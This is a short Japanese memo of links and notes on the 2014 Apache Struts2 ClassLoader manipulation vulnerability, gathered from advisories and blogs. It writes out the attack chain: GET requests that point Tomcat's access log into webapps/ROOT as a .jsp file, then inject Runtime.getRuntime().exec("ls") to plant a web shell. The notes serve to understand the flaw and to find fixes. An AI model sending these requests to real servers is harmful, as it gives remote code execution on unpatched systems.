メモ


http://www.ipa.go.jp/security/ciadr/vul/20140417-struts.html


http://www.lac.co.jp/security/alert/2014/04/24_alert_01.html


http://www.nca.gr.jp/2014/struts_s20/index.html
see
class.classLoader.resources.context.parent.pipeline.first.* (*はワイルドカード)
class.classLoader.resources.dirContext.docBase
GET /example.action?class.classLoader.resources.context.parent.pipeline.first.prefix=shell
GET /example.action?class.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT


http://rootdown.cocolog-nifty.com/memo/2014/04/apache-struts2-.html
shell1.jsp ログとして「<%Runtime.getRuntime().exec("calc");%>


http://qiita.com/akiramuramatsu/items/71882fd06d0eac21645c
jabaraster
multipart/form-dataのPOST

http://d.hatena.ne.jp/Kango/20140417/1397750197
  http://localhost:8080/example.action?class.classLoader.(操作したい属性)
 /HelloWorld.action?class.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT
 /HelloWorld.action?class.classLoader.resources.context.parent.pipeline.first.prefix=shell
 /HelloWorld.action?class.classLoader.resources.context.parent.pipeline.first.suffix=.jsp
 /HelloWorld.action?class.classLoader.resources.context.parent.pipeline.first.fileDateFormat=1
ttp://localhost:8080/struts2-blank/example/aaaa.jsp?a=<%Runtime.getRuntime().exec("ls");%>


http://www.nta.go.jp/sonota/sonota/osirase/service.htm
「e-Taxソフト（WEB版）」、「確定申告書等作成コーナー」、「NISA（日本版ISA）コーナー」　サービス停止のお知らせ（重要）平成26年4月25日


http://qiita.com/kawasima/items/670d2591bc8fea19dc1d

http://itpro.nikkeibp.co.jp/article/NEWS/20140425/553442/


http://isayan.cocolog-nifty.com/diary/2014/04/s2-020.html
 この一覧。

http://sec.baidu.com/index.php?research/detail/id/18
　これだけ使える。

http://aoking.hatenablog.jp/
一番良いとされる対応策